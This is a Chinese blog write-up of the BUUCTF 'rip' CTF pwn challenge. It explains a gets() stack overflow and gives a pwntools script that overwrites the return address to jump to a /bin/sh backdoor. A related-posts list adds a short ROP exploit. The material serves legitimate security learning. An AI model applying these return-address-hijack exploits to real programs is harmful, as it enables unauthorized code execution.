BUUCTF-rip

最新推荐文章于 2024-01-25 17:01:44 发布
最新推荐文章于 2024-01-25 17:01:44 发布
阅读量631 收藏 1
点赞数 1
分类专栏: PWN的学习 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/130084100
版权

https://www.cnblogs.com/refrain-again/p/15001283.html

看了这个文章 我起码能理解我们栈溢出的目的

在做题之前 我们需要先理解

栈的存储方法

 从上往下看 就能理解入栈

说回这道题目

为什么这道题目是栈溢出

1.查看基本信息

checksec

 file

是kali下的elf文件 相当于windows 的exe
可执行文件

有main()和fun()

我们把他放入ida

2.ida

主函数的代码

 但是我们发现还有一个fun()函数

 找到我们的进门钥匙

我们发现我们是输入 东西 并且作为 s

s 的类型是 char    占15个字节

我们看看我们需要多少才能达到被调用函数的返回地址

就是我们需要多少字节才能 让被调用函数返回

在ida中很明显告诉我们栈底和栈顶是多少了

因为是64 

rdp是栈底 就是高地址   函数结束地址


rsp是栈顶 就是低地址   函数开始地址 压入栈地址

FH = 15字节

从图里能看见 局部变量的压入 就是我们输入的s 占 15字节

但是前面还有一个被调用函数的基地址 就是rbp 我们也要给他构造

但是这个多大呢

因为这道题目是 64 所以 rbp是 8个字节
如果是 32 就是ebp 占 4个字节

所以我们只需要构造15字节的东西填充s 构造8个字节的东西填充基地址 并且把函数返回地址改为fun函数地址即可

我们也要明白 fun函数开始的地址是什么

 得到函数开始地址

0x401186

这样就能返回到fun函数开始地址

执行fun函数

所以我们开始写exp

from pwn import *
p=remote('node4.buuoj.cn',27408)
payload=b'A'*15+b'B'*8+p64(0x401186+1) 
p.sendline(payload)
p.interactive()

输入二进制15个A和8个B 打包小端序的地址 

其中+1是为了栈平衡 (不明白)

如果脚本结尾忘了加p.interactive(),并且交互完程序并未停止的话,程序会直接被杀掉……然后你就会看到调试时总是莫名其妙的sigkill……

p64()发送数据时,是发送的字节流,也就是比特流(二进制流)

 

成功

 cat flag

 

双层小牛堡
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
计算机网络实验-RIP实验报告.pdf
04-21
RIP实验报告,计算机网络实验 如果拓扑图如图 11-7 所示,应该如何配置才能使所有 PC 机相互通信? 如果是 3 个路由器组成的拓扑图如图 11-8 所示,应该如何配置才能使 所有 PC 机相互通信?
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4703
BUU CTF PWN 入门知识详解
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1457
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
rip-BUUCTF(栈溢出)
yuqie的博客
06-14 317
使用ida反汇编程序,发现是一个栈溢出类型,从函数中可以看出给了一个s数组,但没有对输入的长度作限制,因为是一个典型的栈溢出漏洞。然后从main函数之下的fun函数里可以看见一个后门。顺便记录一下后门地址为0x0000000000401186.先使用命令checksec 查看程序保护情况。 发现并没有canary保护。使用gdb结合pwndbg调试进程,计算我们覆盖到返回地址所需字节。使用快捷命令b在main函数处下断点,并使用r(run)运行。 使用命令 n 按行运行,找到输入点,并随便输入几个字
pwn学习(3)BUUCTF-rip(函数知识/缓冲区溢出)
m0_66039322的博客
09-21 508
1.函数调用栈是指程序运行时内存一段连续的区域。(特殊的内存)2.用来保存函数运行时的状态信息,包括函数参数与局部变量等。3.称之为‘栈’是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。4.在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态5.函数调用栈在内存中从高地址向低地址生长,所以栈顶对应的内存地址在压栈时变小,退栈时变大。
BUUCTFrip
^_^
12-08 3212
这题和蒸米ROP的level3有点像。 检查安全机制。 用ida反汇编,可以看到是gets函数有个简单的栈溢出,偏移也很好计算,F+8=23 此外还发现一个fun函数可以直接跳转到这里来获取shell。 正常exp如下: from pwn import * p = process("./pwn1") #p = remote("node3.buuoj.cn",29399) payload = "a" * 23 +p64(0x401186) p.sendline(payload) p.interact
思科-RIP的基础配置
04-07
内容概要:配置RIP动态路由和默认路由,使用相应的RIP和静态两种路由协议实现网络的互通,加深对动态路由能够减少一定的配置量这一规律的理解。 适合人群:初学路由交换技术的学生、或者对路由交换与交换的人群。 ...
华为模拟器eNSP练习题-RIP
01-04
实验需要的网络拓扑,配置命令,topo
win7-32位安装Linotronic 530-RIP 30 v52.3.rar
07-31
win7-32位安装Linotronic 530-RIP 30 v52.3.rar
IP路由-RIP与静态路由-重复布.docx
02-24
IP路由-RIP与静态路由-重复布.docx
BUUCTF刷题之路-rip1
qq_30528603的博客
05-25 1076
因为A存入内存是以ASCLL码形式存在 0x41就是A,我们填入的15个A已经在栈上了,而且返回地址就是401100,我们要做的就是覆盖这个返回地址,指向我们的后门函数fun,至此这题就完成了。让我们能得到一个shell.那我们就找一下这个fun函数的地址,因为题目没有开启PIE,所以程序每次加载的地址都是不变的。可以看到保护基本没开,是个很简单的栈溢出题目。左边这都是函数,带下划线的一般是系统提供的函数,我们分析前可以大致看看有哪些函数,都干了什么,对整体布局有个了解,我们一开始都回去分析main函数。
BUUCTF 【Pwn】rip 解题步骤
2301_81505831的博客
01-25 652
查看之后发现是64位的ELF文件,直接放入IDA64进行反编译。
BUUCTF -rip
weixin_56301399的博客
07-20 372
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
[buuctf] rip
zn106414的博客
03-31 652
64位,源程序几乎没有开启任何保护 用ida打开 存在危险函数gets,没有限制输入,存在栈溢出漏洞 还有一个func函数执行了/bin/sh命令 双击s来到Stack of main视图,发现只需存入15个字节即可劫持函数返回地址 因为是64位程序,还需要加8字节的返回地址,因此偏移量为23 或者这里也可以使用pwntools计算一下: pattern create 200 pattern offset A(AADAA; 也可以...
栈溢出的基础原理,EBP/EIP/ESP详解 --- buuctf rip 1题目讲解
yajuanpi4899的博客
11-28 5427
栈帧概念:一个基本函数所需要的栈空间,当调用子函数时需要调用新的栈帧 涉及到栈有三个寄存器(32):esp,eip,ebp-->对应64位的rsp,rip,rbp esp:指向当前栈帧的顶部。 ebp:指向当前栈帧的底部。 eip:指向当前栈帧中执行的指令。 栈溢出漏洞的基本方向是:父函数(caller)在调用子函数(callee)结束时,会取子函数的return address,这个地址中保存着父函数的基地址。即:在一个函数调用完以后,就要删除此时的栈帧并将Return Address
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2357
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2359
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
buuctf pwn rip 1,rop解法
amber_o0k的博客
11-07 1101
from pwn import * io = remote('node4.buuoj.cn', 27175) pop_rdi_ret=0x4011fb bin_sh=0x40201b syscall=0x401040 ret=0x401016 payload=b'a'*(0xf+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(syscall) io.sendline(payload) io.interactive() 这个解法有点复杂了,强行构造了一波rop。.
BUUCTF_PWN - rip
weixin_46009088的博客
12-06 707
BUUCTF_PWN - rip 查看程序保护模式和文件基本信息: 没有什么保护,各条保护详情介绍请看胡写瞎写(1) pwntools常见命令,另外文件是64位小端程序 IDA载入 找到main函数F5: 发现一个 gets ( ) 函数,一个可以利用的漏洞点,gets ( ) 函数介绍: get( )函数简单易用,它读取从输入流中读取一行,赋给字符串变量s,直到遇到换行符,然后丢弃换行符,存储其余的字符,并在结尾添加一个空字符使其成为一个 C 字符串,但是它无法检查数组是否装的下,因此它只知道开始处,.
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值